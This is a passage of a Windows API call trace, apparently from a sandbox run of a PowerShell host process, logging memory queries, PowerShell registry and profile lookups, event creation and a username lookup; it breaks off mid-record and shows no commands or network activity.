lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.078] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.078] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.078] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.078] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.078] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.078] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.078] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.078] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.078] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.078] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.079] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.079] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.079] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.079] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.079] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.079] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.079] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.079] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.079] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.079] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.079] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.079] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.080] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dddac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.147] GetLastError () returned 0xcb [0149.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.147] GetLastError () returned 0xcb [0149.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.147] GetLastError () returned 0xcb [0149.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.147] GetLastError () returned 0xcb [0149.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dddac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.172] GetLastError () returned 0xcb [0149.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.172] GetLastError () returned 0xcb [0149.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.172] GetLastError () returned 0xcb [0149.172] VirtualQuery (in: lpAddress=0x2dd2d8, lpBuffer=0x2de2d8, dwLength=0x1c | out: lpBuffer=0x2de2d8*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dddac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.173] GetLastError () returned 0xcb [0149.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.173] GetLastError () returned 0xcb [0149.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.173] GetLastError () returned 0xcb [0149.173] VirtualQuery (in: lpAddress=0x2dd2d0, lpBuffer=0x2de2d0, dwLength=0x1c | out: lpBuffer=0x2de2d0*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.173] VirtualQuery (in: lpAddress=0x2dcf84, lpBuffer=0x2ddf84, dwLength=0x1c | out: lpBuffer=0x2ddf84*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.173] VirtualQuery (in: lpAddress=0x2dcf84, lpBuffer=0x2ddf84, dwLength=0x1c | out: lpBuffer=0x2ddf84*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.176] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2dea0c | out: phkResult=0x2dea0c*=0x3c8) returned 0x0 [0149.176] RegQueryValueExW (in: hKey=0x3c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2dea54, lpData=0x0, lpcbData=0x2dea50*=0x0 | out: lpType=0x2dea54*=0x1, lpData=0x0, lpcbData=0x2dea50*=0x56) returned 0x0 [0149.176] RegQueryValueExW (in: hKey=0x3c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2dea54, lpData=0x3da558, lpcbData=0x2dea50*=0x56 | out: lpType=0x2dea54*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2dea50*=0x56) returned 0x0 [0149.176] RegCloseKey (hKey=0x3c8) returned 0x0 [0149.176] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2dea0c | out: phkResult=0x2dea0c*=0x3c8) returned 0x0 [0149.176] RegQueryValueExW (in: hKey=0x3c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2dea54, lpData=0x0, lpcbData=0x2dea50*=0x0 | out: lpType=0x2dea54*=0x1, lpData=0x0, lpcbData=0x2dea50*=0x56) returned 0x0 [0149.176] RegQueryValueExW (in: hKey=0x3c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2dea54, lpData=0x3da558, lpcbData=0x2dea50*=0x56 | out: lpType=0x2dea54*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2dea50*=0x56) returned 0x0 [0149.177] RegCloseKey (hKey=0x3c8) returned 0x0 [0149.178] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3da558 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0149.178] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x2de5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0149.178] GetLastError () returned 0x3f0 [0149.179] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3da558 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0149.179] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x2de5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0149.179] GetLastError () returned 0x3f0 [0149.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x2de63c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0149.180] GetLastError () returned 0x3f0 [0149.180] SetErrorMode (uMode=0x1) returned 0x1 [0149.180] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x2deabc | out: lpFileInformation=0x2deabc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.180] GetLastError () returned 0x2 [0149.180] SetErrorMode (uMode=0x1) returned 0x1 [0149.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x2de63c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0149.180] GetLastError () returned 0x2 [0149.180] SetErrorMode (uMode=0x1) returned 0x1 [0149.180] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x2deabc | out: lpFileInformation=0x2deabc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.180] GetLastError () returned 0x2 [0149.180] SetErrorMode (uMode=0x1) returned 0x1 [0149.180] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x2de63c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39 [0149.180] GetLastError () returned 0x2 [0149.180] SetErrorMode (uMode=0x1) returned 0x1 [0149.180] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x2deabc | out: lpFileInformation=0x2deabc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.180] GetLastError () returned 0x3 [0149.180] SetErrorMode (uMode=0x1) returned 0x1 [0149.181] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x2de63c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e [0149.181] GetLastError () returned 0x3 [0149.181] SetErrorMode (uMode=0x1) returned 0x1 [0149.181] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x2deabc | out: lpFileInformation=0x2deabc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.181] GetLastError () returned 0x3 [0149.181] SetErrorMode (uMode=0x1) returned 0x1 [0149.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.182] GetLastError () returned 0xcb [0149.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.183] GetLastError () returned 0xcb [0149.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.185] GetLastError () returned 0xcb [0149.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.187] GetLastError () returned 0xcb [0149.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.187] GetLastError () returned 0xcb [0149.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.246] GetLastError () returned 0xcb [0149.246] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c8 [0149.246] GetLastError () returned 0x0 [0149.246] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x38c [0149.246] GetLastError () returned 0x0 [0149.246] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0 [0149.246] GetLastError () returned 0x0 [0149.246] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4 [0149.246] GetLastError () returned 0x0 [0149.246] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x34c [0149.246] GetLastError () returned 0x0 [0149.246] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x31c [0149.247] GetLastError () returned 0x0 [0149.247] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b8 [0149.247] GetLastError () returned 0x0 [0149.247] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324 [0149.247] GetLastError () returned 0x0 [0149.247] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x340 [0149.247] GetLastError () returned 0x0 [0149.247] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x350 [0149.247] GetLastError () returned 0x0 [0149.247] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x354 [0149.247] GetLastError () returned 0x0 [0149.247] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358 [0149.247] GetLastError () returned 0x0 [0149.248] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.248] GetLastError () returned 0xcb [0149.251] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0149.251] GetLastError () returned 0xcb [0149.251] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x2deafc | out: lpMode=0x2deafc) returned 1 [0149.252] GetLastError () returned 0xcb [0149.255] SetEvent (hEvent=0x3b4) returned 1 [0149.255] GetLastError () returned 0xcb [0149.255] SetEvent (hEvent=0x3c8) returned 1 [0149.255] GetLastError () returned 0xcb [0149.255] SetEvent (hEvent=0x38c) returned 1 [0149.255] GetLastError () returned 0xcb [0149.255] SetEvent (hEvent=0x3b0) returned 1 [0149.255] GetLastError () returned 0xcb [0149.255] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x35c [0149.255] GetLastError () returned 0x0 [0149.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.256] GetLastError () returned 0xcb [0149.257] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de960 | out: phkResult=0x2de960*=0x360) returned 0x0 [0149.257] RegQueryValueExW (in: hKey=0x360, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x2de9a8, lpData=0x0, lpcbData=0x2de9a4*=0x0 | out: lpType=0x2de9a8*=0x0, lpData=0x0, lpcbData=0x2de9a4*=0x0) returned 0x2 [0153.239] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388 [0153.239] GetLastError () returned 0x0 [0153.239] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c0 [0153.239] GetLastError () returned 0x0 [0153.239] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c4 [0153.239] GetLastError () returned 0x0 [0153.239] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320 [0153.239] GetLastError () returned 0x0 [0153.239] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x390 [0153.239] GetLastError () returned 0x0 [0153.239] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x394 [0153.239] GetLastError () returned 0x0 [0153.239] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398 [0153.239] GetLastError () returned 0x0 [0153.239] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac [0153.239] GetLastError () returned 0x0 [0153.239] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d0 [0153.239] GetLastError () returned 0x0 [0153.239] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3d4 [0153.239] GetLastError () returned 0x0 [0153.240] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d8 [0153.240] GetLastError () returned 0x0 [0153.240] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3dc [0153.240] GetLastError () returned 0x0 [0153.240] SetEvent (hEvent=0x320) returned 1 [0153.240] GetLastError () returned 0x0 [0153.240] SetEvent (hEvent=0x388) returned 1 [0153.240] GetLastError () returned 0x0 [0153.240] SetEvent (hEvent=0x3c0) returned 1 [0153.240] GetLastError () returned 0x0 [0153.240] SetEvent (hEvent=0x3c4) returned 1 [0153.240] GetLastError () returned 0x0 [0153.240] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e0 [0153.240] GetLastError () returned 0x0 [0153.240] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de994 | out: phkResult=0x2de994*=0x3e4) returned 0x0 [0153.240] RegQueryValueExW (in: hKey=0x3e4, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x2de9dc, lpData=0x0, lpcbData=0x2de9d8*=0x0 | out: lpType=0x2de9dc*=0x0, lpData=0x0, lpcbData=0x2de9d8*=0x0) returned 0x2 [0153.401] SetEvent (hEvent=0x390) returned 1 [0153.401] GetLastError () returned 0x0 [0153.401] SetEvent (hEvent=0x394) returned 1 [0153.401] GetLastError () returned 0x0 [0153.401] SetEvent (hEvent=0x398) returned 1 [0153.401] GetLastError () returned 0x0 [0153.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.434] GetLastError () returned 0xcb [0153.460] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3d2e10, nSize=0x2dea70 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x2dea70) returned 0x1 [0153.463] GetLastError () returned 0xcb [0153.463] GetUserNameW (in: lpBuffer=0x3da558, pcbBuffer=0x2dea78 | out: lpBuffer="aETAdzjz", pcbBuffer=0x2dea78) returned 1 [0153.465] ReportEventW (hEventLog=0x2b20004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, 